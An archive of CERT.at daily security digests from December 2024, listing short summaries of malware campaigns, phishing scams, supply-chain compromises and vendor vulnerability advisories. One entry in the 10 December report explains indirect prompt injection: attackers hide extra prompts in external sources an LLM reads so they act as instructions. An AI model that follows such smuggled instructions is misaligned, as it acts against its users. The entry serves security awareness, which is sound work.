--------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2024-69/ ∗∗∗ F5: K000148931: Linux kernel vulnerability CVE-2024-26923 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148931 ∗∗∗ Huawei: Security Advisory - Path Traversal Vulnerability in Huawei Home Music System ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-ptvihhms-… ∗∗∗ Numerix: Reflected Cross-Site Scripting in Numerix License Server Administration System Login ∗∗∗ --------------------------------------------- https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scr… ∗∗∗ Splunk: SVD-2024-1207: Third-Party Package Updates in Splunk Universal Forwarder - December 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1207 ∗∗∗ Splunk: SVD-2024-1206: Third-Party Package Updates in Splunk Enterprise - December 2024 ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1206 ∗∗∗ Splunk: SVD-2024-1205: Remote Code Execution through Deserialization of Untrusted Data in Splunk Secure Gateway app ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1205 ∗∗∗ Splunk: SVD-2024-1204: Sensitive Information Disclosure through SPL commands ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1204 ∗∗∗ Splunk: SVD-2024-1203: Information Disclosure due to Username Collision with a Role that has the same Name as the User ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1203 ∗∗∗ Splunk: SVD-2024-1202: Risky command safeguards bypass in “/en-US/app/search/report“ endpoint through “s“ parameter ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1202 ∗∗∗ Splunk: SVD-2024-1201: Information Disclosure in Mobile Alert Responses in Splunk Secure Gateway ∗∗∗ --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1201 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 10.12.2024
by Daily end-of-shift report 10 Dec '24

10 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Montag 09-12-2024 18:00 − Dienstag 10-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Brute-Force-Angriffe auf exponierte Systeme ∗∗∗ --------------------------------------------- Aktuell werden dem BSI verstärkt Brute-Force-Angriffe gegen Citrix Netscaler Gateways aus verschiedenen KRITIS-Sektoren sowie von internationalen Partnern gemeldet. [..] Die aktuellen Angriffe heben sich aktuell lediglich in ihrer berichteten Menge von üblichen Angriffen dieser Art heraus. [..] Als Ziel der Brute-Force-Angriffe werden in aktuellen Berichten zwar Citrix Gateways gemeldet. Jedoch ist diese Cyber-Sicherheitswarnung für alle exponierten Systeme, insbesondere VPN-Gateways, relevant. --------------------------------------------- https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-2… ∗∗∗ Stark gestiegenes Aufkommen an Microsoft Remote Desktop Protokoll (RDP) Scanning ∗∗∗ --------------------------------------------- Ein internationaler Partner (Shadowserver) verzeichnet seit Anfang Dezember ein weltweit sehr stark gestiegenes Aufkommen (x160) an RDP "Scanning" in Wellen [1]. Ob es nur um Ausforschen offener RDP-Ports geht oder bereits weitere Handlungen gesetzt werden, ist aktuell unbekannt. Der Fokus scheint nicht auf dem RDP Standard-Port 3389, sondern auf Port 1098 zu liegen. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/12/stark-gestiegenes-aufkommen-an-mic… ∗∗∗ Microsoft ergreift Maßnahmen gegen NTLM-Relay-Angriffe ∗∗∗ --------------------------------------------- Ein Angriffsvektor zum Erlangen von Zugriff im Netz ist sogenanntes NTLM-Relaying. Das erschwert Microsoft nun mit neuen Maßnahmen. --------------------------------------------- https://heise.de/-10194220 ∗∗∗ Ultralytics PyPI Package Compromised Through GitHub Actions Cache Poisoning ∗∗∗ --------------------------------------------- Over the weekend, the popular Ultralytics PyPI package was compromised in a supply chain attack that was detected following reports of a discrepancy between the library’s code on GitHub and the code that was published to PyPI for v8.3.41. --------------------------------------------- https://socket.dev/blog/ultralytics-pypi-package-compromised-through-github… ∗∗∗ Malware trends: eBPF exploitation, malware configurations stored in unexpected places, and increased use of custom post-exploitation tools ∗∗∗ --------------------------------------------- An investigation into an information security incident has allowed virus analysts at Doctor Web to uncover an ongoing campaign that incorporates many modern trends employed by cybercriminals. A client approached Doctor Web after suspecting that their computer infrastructure had been compromised. While analyzing the client’s data, our virus analysts identified a number of similar cases, leading them to conclude that an active campaign was underway. --------------------------------------------- https://news.drweb.com/show/?i=14955&lng=en&c=9 ∗∗∗ When User Input Lines Are Blurred: Indirect Prompt Injection Attack Vulnerabilities in AI LLMs ∗∗∗ --------------------------------------------- Indirect prompt attacks are when an LLM takes input from external sources but where an attacker gets to smuggle payloads (additional prompts!) into these external/side sources. These malicious additional prompts modify the overall prompt, breaking out of the data context as they are treated as instructions (they are additional prompts, commands, if you will) and, in turn, influence the initial user prompt provided together with the system prompt and with that, the subsequent actions and output. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/when-user-i… ∗∗∗ Inside Zloader’s Latest Trick: DNS Tunneling ∗∗∗ --------------------------------------------- Zloader (a.k.a. Terdot, DELoader, or Silent Night) is a modular Trojan based on the leaked Zeus source code that emerged in 2015. The malware was originally designed to facilitate banking fraud via Automated Clearing House (ACH) and wire transfers. However, similar to other malware families like Qakbot and Trickbot, Zloader has been repurposed for initial access, providing an entry point into corporate environments for the deployment of ransomware. --------------------------------------------- https://www.zscaler.com/blogs/security-research/inside-zloader-s-latest-tri… ∗∗∗ Mit dem Bumble-Date ins Theater? Vorsicht vor Betrug! ∗∗∗ --------------------------------------------- Sie haben auf Bumble jemanden kennengelernt? Sie verstehen sich gut und wollen als erstes Date ins Theater gehen? Doch Ihr Ticket sollten Sie sich selbst auf einer unbekannten Plattform kaufen. Vorsicht, hinter dem vermeintlich perfekten Match stecken Kriminelle, die Sie in einen Fake-Shop locken. --------------------------------------------- https://www.watchlist-internet.at/news/mit-dem-bumble-date-ins-theater-vors… ∗∗∗ Studie gemeinsam mit dem BSI: IT-Sicherheit von smarten Heizkörperthermostaten ∗∗∗ --------------------------------------------- Certitude führte im Auftrag des Bundesministerium für Sicherheit in der Informationstechnik (BSI) die technische Sicherheitsprüfung von smarten Heizkörperthermostaten durch. Die aus diesem Projekt entstandene und heute veröffentlichte Studie zeigt auf, dass es insbesondere beim Umgang mit Schwachstellen Nachholbedarf gibt. --------------------------------------------- https://certitude.consulting/blog/de/bsi-studie-sicherheit-smarte-heizkorpe… ∗∗∗ Full-Face Masks to Frustrate Identification ∗∗∗ --------------------------------------------- It’s a video of someone trying on a variety of printed full-face masks. They won’t fool anyone for long, but will survive casual scrutiny. And they’re cheap and easy to swap. --------------------------------------------- https://www.schneier.com/blog/archives/2024/12/full-face-masks-to-frustrate… ===================== = Vulnerabilities = ===================== ∗∗∗ Transfer-Software von Cleo: Hinter Firewall bringen, Patch wirkungslos ∗∗∗ --------------------------------------------- Die Datenstransfer-Software von Cleo hatte eine Sicherheitslücke gestopft – jedoch unzureichend. Das Leck wird aktiv angegriffen. --------------------------------------------- https://heise.de/-10193961 ∗∗∗ Wordpress: WPForms-Plug-in reißt Sicherheitsleck in 6 Millionen Webseiten ∗∗∗ --------------------------------------------- Im Wordpress-Plug-in WPForms können Angreifer eine Lücke missbrauchen, um etwa Zahlungen rückabzuwickeln. Sechs Millionen Webseiten nutzen das Plug-in. --------------------------------------------- https://heise.de/-10193387 ∗∗∗ MC LR Router and GoCast unpatched vulnerabilities ∗∗∗ --------------------------------------------- Cisco Talos Vulnerability Research team recently discovered two vulnerabilities in MC Technologies LR Router and three vulnerabilities in the GoCast service. These vulnerabilities have not been patched at time of this posting. --------------------------------------------- https://blog.talosintelligence.com/mc-lr-router-and-gocast-zero-day-vulnera… ∗∗∗ SAP-Patchday: Updates schließen teils kritische Sicherheitslücken ∗∗∗ --------------------------------------------- Im Dezember informiert SAP über neun neu entdeckte Sicherheitslücken in diversen Produkten. Eine davon gilt als kritisches Risiko. --------------------------------------------- https://heise.de/-10193418 ∗∗∗ Sicherheitsschwachstelle in Logitech MX Keys for Business (SYSS-2024-084) ∗∗∗ --------------------------------------------- SySS GmbH is currently not aware of a security fix for the described issue. [..] Due to the keyboard not enforcing any sort of authentication during the pairings, MX Keys for Business is vulnerable to machine-in-the-middle (MitM) attacks. --------------------------------------------- https://www.syss.de/pentest-blog/sicherheitsschwachstelle-in-logitech-mx-ke… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (postgresql:15, postgresql:16, and ruby:3.1), Debian (jinja2), Fedora (python-multipart, python-python-multipart, python3.12, retsnoop, rust-rbspy, rust-rustls, and zabbix), Oracle (kernel, libsoup, postgresql:12, postgresql:13, postgresql:15, postgresql:16, redis:7, and ruby:3.1), SUSE (nodejs18, pam, qt6-webengine, and radare2), and Ubuntu (dogtag-pki, linux-intel-iotg, linux-intel-iotg-5.15, ofono, rabbitmq-server, and webkit2gtk). --------------------------------------------- https://lwn.net/Articles/1001597/ ∗∗∗ MOBATIME Network Master Clock ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-01 ∗∗∗ Horner Automation Cscape ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-05 ∗∗∗ Rockwell Automation Arena ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-06 ∗∗∗ National Instruments LabVIEW ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-345-04 ∗∗∗ Milesight UG67 Outdoor LoRaWAN Gateway rt-sa-2024-001 - rt-sa-2024-005 ∗∗∗ --------------------------------------------- https://www.redteam-pentesting.de/en/advisories/ ∗∗∗ SSA-979056 V1.0: Out of Bounds Write Vulnerability in Parasolid ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-979056.html ∗∗∗ SSA-881356 V1.0: Multiple Memory Corruption Vulnerabilities in Simcenter Femap ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-881356.html ∗∗∗ SSA-800126 V1.0: Deserialization Vulnerability in Siemens Engineering Platforms before V20 ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-800126.html ∗∗∗ SSA-730188 V1.0: Multiple File Parsing Vulnerabilities in Solid Edge V2024 ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-730188.html ∗∗∗ SSA-701627 V1.0: XXE Injection Vulnerabilities in COMOS ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-701627.html ∗∗∗ SSA-645131 V1.0: Multiple WRL File Parsing Vulnerabilities in Teamcenter Visualization ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-645131.html ∗∗∗ SSA-620799 V1.0: Denial of Service Vulnerability During BLE Pairing in SENTRON Powercenter 1000/1100 ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-620799.html ∗∗∗ SSA-392859 V1.0: Local Arbitrary Code Execution Vulnerability in Siemens Engineering Platforms before V20 ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-392859.html ∗∗∗ SSA-384652 V1.0: Cross-Site Request Forgery (CSRF) Vulnerability in RUGGEDCOM ROX II ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-384652.html ∗∗∗ SSA-128393 V1.0: Firmware Decryption Vulnerability in SICAM A8000 CP-8031 and CP-8050 ∗∗∗ --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-128393.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 09.12.2024
by Daily end-of-shift report 09 Dec '24

09 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 06-12-2024 18:00 − Montag 09-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Phish Supper: An Incident Responder’s Bread and Butter ∗∗∗ --------------------------------------------- This post will delve into a recent business email compromise engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, which saw the compromise of 12 users’ Microsoft 365 accounts. --------------------------------------------- https://www.nccgroup.com/us/research-blog/phish-supper-an-incident-responde… ∗∗∗ Hackers Using Fake Video Conferencing Apps to Steal Web3 Professionals Data ∗∗∗ --------------------------------------------- "The threat actors behind the malware have set up fake companies using AI to make them increase legitimacy," Cado Security researcher Tara Gould said. "The company reaches out to targets to set up a video call, prompting the user to download the meeting application from the website, which is Realst infostealer." --------------------------------------------- https://thehackernews.com/2024/12/hackers-using-fake-video-conferencing.html ∗∗∗ Abusing Git branch names to compromise a PyPI package ∗∗∗ --------------------------------------------- A compromised release was uploaded to PyPI after a project automatically processed a pull request with a flawed script. [..] This problem has been known for several years, but this event may serve as a good reminder to be careful with automated access to important secrets. --------------------------------------------- https://lwn.net/Articles/1001215/ ∗∗∗ A vulnerability in the OpenWrt attended sysupgrade server ∗∗∗ --------------------------------------------- The OpenWrt project has issued anadvisory regarding a vulnerability found in its Attended SysupgradeServer that could allow compromised packages to be installed on a router byan attacker. No official OpenWrt images were affected, and the vulnerability is not known to be exploited, but users who have installedimages created with an instance of this server are recommended toreinstall. --------------------------------------------- https://lwn.net/Articles/1001441/ ∗∗∗ Secure Coding: CWE-1007 – die unsichtbare Gefahr durch visuell ähnliche Zeichen ∗∗∗ --------------------------------------------- Vorsätzliche Homoglyphen-Angriffe durch visuell ähnliche Zeichen können Anwender in die Irre leiten. Zum Schutz dagegen helfen verschiedene Best Practices. --------------------------------------------- https://heise.de/-10188217 ∗∗∗ Malicious Maven Package Impersonating XZ for Java Library Introduces Backdoor Allowing Remote Code Execution ∗∗∗ --------------------------------------------- Socket researchers have discovered a malicious Maven package io.github.xz-java:xz-java that impersonates the legitimate XZ for Java library org.tukaani:xz. This deceptive package creates a hidden backdoor that enables remote command execution, posing a threat to enterprise supply chains. --------------------------------------------- https://socket.dev/blog/malicious-maven-package-impersonating-xz-for-java-l… ∗∗∗ Exploit Code Released for Microsoft CVE-2024-38193 ∗∗∗ --------------------------------------------- A critical use-after-free vulnerability, tracked as CVE-2024-38193 with a CVSS score of 7.8, has been discovered in the afd.sys Windows driver that allows attackers to escalate privileges and execute arbitrary code. This vulnerability has been fixed during the August 2024 patch on Tuesday. [..] Security researcher Nephster has published a proof-of-concept (PoC) code for the CVE-2024-38193 vulnerability on GitHub, further escalating its potential threat. --------------------------------------------- https://thecyberthrone.in/2024/12/09/exploit-code-released-for-microsoft-cv… ===================== = Vulnerabilities = ===================== ∗∗∗ Qlik: High Security fixes for Qlik Sense Enterprise for Windows (CVEs-pending) ∗∗∗ --------------------------------------------- Security issues in Qlik Sense Enterprise for Windows have been identified, and patches have been made available. If the vulnerabilities are successfully exploited, these issues could lead to a compromise of the server running the Qlik Sense software, including remote code execution (RCE). --------------------------------------------- https://community.qlik.com/t5/Official-Support-Articles/High-Security-fixes… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (redis:7, ruby, ruby:2.5, and ruby:3.1), Debian (avahi, ceph, chromium, gsl, jinja2, php7.4, renderdoc, ruby-doorkeeper, and zabbix), Fedora (chromium, python3.11, and uv), Gentoo (Asterisk, Cacti, Chromium, Google Chrome, Microsoft Edge. Opera, Dnsmasq, firefox, HashiCorp Consul, icinga2, OATH Toolkit, OpenJDK, PostgreSQL, R, Salt, Spidermonkey, and thunderbird), Mageia (kubernetes), Red Hat (grafana, grafana-pcp, osbuild-composer, and postgresql), SUSE (ansible-core, firefox, glib2, java-1_8_0-ibm, kernel-firmware, nanopb, netty, python310-django-ckeditor, python310-jupyter-ydoc, radare2, skopeo, and webkit2gtk3), and Ubuntu (tinyproxy). --------------------------------------------- https://lwn.net/Articles/1001433/ ∗∗∗ ZDI-24-1646: Epic Games Launcher Incorrect Default Permissions Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1646/ ∗∗∗ F5: K000148896: Intel SGX vulnerability CVE-2023-43753 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148896 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 06.12.2024
by Daily end-of-shift report 06 Dec '24

06 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 05-12-2024 18:00 − Freitag 06-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Trojan-as-a-Service Hits Euro Banks, Crypto Exchanges ∗∗∗ --------------------------------------------- At least 17 affiliate groups have used the "DroidBot" Android banking Trojan against 77 financial services companies across Europe, with more to come, researchers warn. --------------------------------------------- https://www.darkreading.com/threat-intelligence/trojan-service-hits-euro-ba… ∗∗∗ Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage ∗∗∗ --------------------------------------------- In this first of a two-part blog series, we discuss how Secret Blizzard has used the infrastructure of the Pakistan-based threat activity cluster we call Storm-0156 — which overlaps with the threat actor known as SideCopy, Transparent Tribe, and APT36 — to install backdoors and collect intelligence on targets of interest in South Asia. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/12/04/frequent-freeloade… ∗∗∗ Malicious Script Injection on WordPress Sites ∗∗∗ --------------------------------------------- Recently, our team discovered a JavaScript-based malware affecting WordPress sites, primarily targeting those using the Hello Elementor theme. This type of malware is commonly embedded within legitimate-looking website files to load scripts from an external source. The malware injects a malicious external script into the theme’s header.php file, leading to harmful consequences for site owners and visitors. --------------------------------------------- https://blog.sucuri.net/2024/12/malicious-script-injection-on-wordpress-sit… ∗∗∗ Hackers Leveraging Cloudflare Tunnels, DNS Fast-Flux to Hide GammaDrop Malware ∗∗∗ --------------------------------------------- The threat actor known as Gamaredon has been observed leveraging Cloudflare Tunnels as a tactic to conceal its staging infrastructure hosting a malware called GammaDrop.The activity is part of an ongoing spear-phishing campaign targeting Ukrainian entities since at least early 2024 thats designed to drop the Visual Basic Script malware, Recorded Futures Insikt Group said in a new analysis. --------------------------------------------- https://thehackernews.com/2024/12/hackers-leveraging-cloudflare-tunnels.html ∗∗∗ Researchers Uncover Flaws in Popular Open-Source Machine Learning Frameworks ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed multiple security flaws impacting open-source machine learning (ML) tools and frameworks such as MLflow, H2O, PyTorch, and MLeap that could pave the way for code execution. The vulnerabilities, discovered by JFrog, are part of a broader collection of 22 security shortcomings the supply chain security company first disclosed last month. --------------------------------------------- https://thehackernews.com/2024/12/researchers-uncover-flaws-in-popular.html ∗∗∗ Announcing the launch of Vanir: Open-source Security Patch Validation ∗∗∗ --------------------------------------------- Today, we are announcing the availability of Vanir, a new open-source security patch validation tool. Introduced at Android Bootcamp in April, Vanir gives Android platform developers the power to quickly and efficiently scan their custom platform code for missing security patches and identify applicable available patches. --------------------------------------------- http://security.googleblog.com/2024/12/announcing-launch-of-vanir-open-sour… ∗∗∗ Tagesgeldkonten: Vorsicht vor betrügerischen Angeboten im Namen von CHECK24 ∗∗∗ --------------------------------------------- In den letzten Tagen wurden vermehrt SMS versendet, in denen im Namen von CHECK24 mit verlockenden Tagesgeldkonten zu einem Zinssatz von bis zu 5,25% geworben wird. Möchte man das Angebot wahrnehmen, wird man auf eine täuschend echt aussehende Phishing-Seite weitergeleitet. Wird dort Geld eingezahlt, landet es auf den Konten von Kriminellen. --------------------------------------------- https://www.watchlist-internet.at/news/tagesgeldkonten-betruegerischen-ange… ∗∗∗ Windows 11 24H2 auf mehr Geräten verfügbar; TPM 2.0-Pflicht; Installation auf unsupported CPUs ∗∗∗ --------------------------------------------- Microsoft hat damit begonnen, dass im Oktober 2024 allgemein freigegebene Windows 11 24H2 (als Windows 11 2024 Update bezeichnet), auf mehr Geräte zu verteilen. Weiterhin hat Microsoft bekräftigt, dass TPM 2.0 für Windows 11 Pflicht ist. Andererseits gibt es Leute, die die Erfahrung machen, dass Windows 11 24H2 auf Hardware, die nicht kompatibel ist, ohne Tricks installiert werden kann. --------------------------------------------- https://www.borncity.com/blog/2024/12/06/windows-11-24h2-auf-mehr-geraeten-… ∗∗∗ Introducing Supply-Chain Firewall: Protecting Developers from Malicious Open Source Packages ∗∗∗ --------------------------------------------- Release of Supply-Chain Firewall, an open source tool for preventing the installation of malicious PyPI and npm packages. --------------------------------------------- https://securitylabs.datadoghq.com/articles/introducing-supply-chain-firewa… ∗∗∗ New Malware Campaign Exposes Gaps in Manufacturing Cybersecurity Defenses ∗∗∗ --------------------------------------------- In a recent analysis by Cyble Research and Intelligence Labs (CRIL), a multi-stage cyberattack campaign has been identified, targeting the manufacturing industry. The attack, which heavily relies on process injection techniques, aims to deliver dangerous payloads, including Lumma Stealer and Amadey Bot. --------------------------------------------- https://thecyberexpress.com/lumma-stealer-amadey-bot-target-manufacturing/ ===================== = Vulnerabilities = ===================== ∗∗∗ SonicWall SMA100 SSL-VPN Affected By Multiple Vulnerabilities ∗∗∗ --------------------------------------------- CVE: CVE-2024-38475, CVE-2024-40763, CVE-2024-45318, CVE-2024-45319, CVE-2024-53702, CVE-2024-53703 --------------------------------------------- https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0018 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro). --------------------------------------------- https://lwn.net/Articles/1001164/ ∗∗∗ Windows: 0patch für 0-day URL File NTLM Hash Disclosure-Schwachstelle ∗∗∗ --------------------------------------------- ACROS Security ist auf eine bisher nicht per Update geschlossene Schwachstelle in Windows gestoßen, die per URL die Offenlegung von NTLM Hash-Werten ermöglicht. ACROS Security hat einen opatch Micropatch veröffentlicht, um diese Schwachstelle zu beseitigen. Bis zum Bereitstellen eines Updates durch Microsoft ist der opatch-Micropatch kostenlos verfügbar. --------------------------------------------- https://www.borncity.com/blog/2024/12/06/windows-0patch-fuer-0-day-url-file… ∗∗∗ Sicherheitsupdate: Backupsoftware Dell NetWorker kann Daten leaken ∗∗∗ --------------------------------------------- Dell hat wichtige Sicherheitspatches für seine Backup- und Recovery-Software NetWorker und das SDK BSAFE veröffentlicht. Noch sind aber nicht alle Updates da. --------------------------------------------- https://heise.de/-10190285 ∗∗∗ QNAP: Vulnerability in Qsync Central ∗∗∗ --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-24-48 ∗∗∗ QNAP: Multiple Vulnerabilities in QTS and QuTS hero (PWN2OWN 2024) ∗∗∗ --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-24-49 ∗∗∗QNAP: Vulnerability in License Center ∗∗∗ --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-24-50 ∗∗∗ Tenable: [R1] Security Center Version 6.5.0 Fixes Multiple Vulnerabilities ∗∗∗ --------------------------------------------- https://www.tenable.com/security/tns-2024-19 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 05.12.2024
by Daily end-of-shift report 05 Dec '24

05 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 04-12-2024 18:00 − Donnerstag 05-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Kostenfalle Gesundheitstest: So schützen Sie sich vor Abzocke ∗∗∗ --------------------------------------------- Auf gesundheitskontrolle.com oder gesundheitsbewertung.com werden 2-minütige Gesundheitstests versprochen. Nach Beantwortung einiger Fragen erhalten Sie angeblich eine „maßgenschneiderte und individuelle Gesundheitsanalyse“ von Gesundheitsexperten. Wir raten zur Vorsicht: Wenige Tage später flattert eine Rechnung über 79 Euro ins Haus. --------------------------------------------- https://www.watchlist-internet.at/news/kostenfalle-gesundheitstest/ ∗∗∗ MOONSHINE Exploit Kit and DarkNimbus Backdoor Enabling Earth Minotaur’s Multi-Platform Attacks ∗∗∗ --------------------------------------------- Trend Micro’s monitoring of the MOONSHINE exploit kit revealed how it’s used by the threat actor Earth Minotaur to exploit Android messaging app vulnerabilities and install the DarkNimbus backdoor for surveillance. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/l/earth-minotaur.html ∗∗∗ Telecom Giant BT Group Hit by Black Basta Ransomware ∗∗∗ --------------------------------------------- BT Group, a major telecommunications firm, has been hit by a ransomware attack from the Black Basta group. The attack targeted the companys Conferencing division, leading to server shutdowns and potential data theft. --------------------------------------------- https://hackread.com/telecom-giant-bt-group-black-basta-ransomware-attack/ ∗∗∗ Vorsicht vor Whatsapp-Phishing mit gespoofter Rufnummer ∗∗∗ --------------------------------------------- Cyber-Kriminelle nehmen deutschsprachige WhatsApp-Nutzer ins Visier und versuchen mit einem perfiden Trick und einem Chatbot deren Accounts zu kapern. --------------------------------------------- https://heise.de/-10188150 ∗∗∗ USA: Acht Telekommunikationsdienste von Cyberangriffen betroffen ∗∗∗ --------------------------------------------- Bereits im Wahlkampf wurde bekannt, dass Kriminelle an die Telefondaten hochrangiger US-Politiker gekommen sind. Doch der Angriff war umfangreicher als gedacht. --------------------------------------------- https://heise.de/-10188807 ∗∗∗ [Guest Diary] Business Email Compromise, (Thu, Dec 5th) ∗∗∗ --------------------------------------------- Business Email Compromise (BEC) is a lucrative attack, which FBI data shows 51 billion dollars in losses between 2013 to 2022 [2]. According to SentinelOne, nearly all cybersecurity attacks (98%) contain a social engineering component [3].The social engineering attacks include phishing, spear phishing, smishing, whaling , etc. --------------------------------------------- https://isc.sans.edu/diary/rss/31474 ===================== = Vulnerabilities = ===================== ∗∗∗ Critical Mitel MiCollab Flaw Exposes Systems to Unauthorized File and Admin Access ∗∗∗ --------------------------------------------- Cybersecurity researchers have released a proof-of-concept (PoC) exploit that strings together a now-patched critical security flaw impacting Mitel MiCollab with an arbitrary file read zero-day, granting an attacker the ability to access files from susceptible instances. [..] WatchTowr Labs' analysis further found that the authentication bypass could be chained with an as-yet-unpatched post-authentication arbitrary file read flaw to extract sensitive information. --------------------------------------------- https://thehackernews.com/2024/12/critical-mitel-micollab-flaw-exposes.html ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (thunderbird, tuned, and webkitgtk), Mageia (python-aiohttp and qemu), Oracle (container-tools:ol8, firefox, java-1.8.0-openjdk, java-11-openjdk, kernel, kernel:4.18.0, krb5, pam, postgresql:16, python-tornado, python3:3.6.8, thunderbird, tigervnc, tuned, and webkit2gtk3), Red Hat (bzip2, postgresql, postgresql:13, postgresql:15, postgresql:16, python-tornado, and ruby:3.1), Slackware (python3), SUSE (postgresql, postgresql16, postgresql17, postgresql13, postgresql14, postgresql15, python-python-multipart, and python3), and Ubuntu (python-django and recutils). --------------------------------------------- https://lwn.net/Articles/1000870/ ∗∗∗ Vier Lücken in HPE Aruba Networking ClearPass Policy Manager geschlossen ∗∗∗ --------------------------------------------- In aktuellen Versionen von HPE Aruba Networking ClearPass Policy Manager haben die Entwickler insgesamt vier Sicherheitslücken geschlossen. Im schlimmsten Fall können Angreifer eigenen Code ausführen und Systeme kompromittieren. --------------------------------------------- https://heise.de/-10188868 ∗∗∗ Drupal: Entity Form Steps - Moderately critical - Cross site scripting - SA-CONTRIB-2024-071 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-071 ∗∗∗ Drupal: Minify JS - Moderately critical - Cross site request forgery - SA-CONTRIB-2024-070 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-070 ∗∗∗ Drupal: Download All Files - Critical - Access bypass - SA-CONTRIB-2024-069 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-069 ∗∗∗ Drupal: Pages Restriction Access - Critical - Access bypass - SA-CONTRIB-2024-068 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-068 ∗∗∗ Drupal: OAuth & OpenID Connect Single Sign On – SSO (OAuth/OIDC Client) - Critical - Cross Site Scripting - SA-CONTRIB-2024-067 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-067 ∗∗∗ Drupal: Print Anything - Critical - Unsupported - SA-CONTRIB-2024-066 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-066 ∗∗∗ Drupal: Megamenu Framework - Critical - Unsupported - SA-CONTRIB-2024-065 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-065 ∗∗∗ Wordfence Intelligence Weekly WordPress Vulnerability Report (November 25, 2024 to December 1, 2024) ∗∗∗ --------------------------------------------- https://www.wordfence.com/blog/2024/12/wordfence-intelligence-weekly-wordpr… ∗∗∗ AutomationDirect C-More EA9 Programming Software ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-340-01 ∗∗∗ Planet Technology Planet WGS-804HPT ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-340-02 -- CERT.at Daily mailing list Listinfo: 